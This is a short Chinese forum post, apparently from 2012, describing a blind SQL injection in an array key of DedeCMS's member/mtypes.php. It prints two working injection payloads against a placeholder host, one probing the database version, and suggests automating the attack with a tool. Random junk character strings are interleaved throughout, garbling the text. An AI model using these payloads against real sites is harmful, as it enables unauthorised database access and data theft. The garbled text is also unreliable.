需要magic_quotes_gpc = Off,所以说是鸡肋啊.7 q w: A V: g6 X4 ^9 l2 Z
: v+ s; g/ u0 [
" k6 x8 Q8 x% Z+ R发生在数组key里的注射漏洞,有点意思.
, w" Y: F! T: ]( ] , i6 C$ \; i; @/ u b+ s3 c! Q2 C4 T) F
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
9 U2 O( B4 h7 d( w4 Z$ K4 H X$ f1 \2 ?* F4 |
http://www.xxx.com /dede/member/mtypes.php?dopost=save
+ R: c- v' @- x3 y: ~
; q3 { S; X$ Pexploit:: U: v# V! y0 @+ ^0 {8 Q
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r1 {* P2 n. h' q. f! e4 \
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r8 n, O- r/ n3 l+ Z- G$ r8 q
|
发表于 2012-12-20 08:08:09
收藏
支持
反对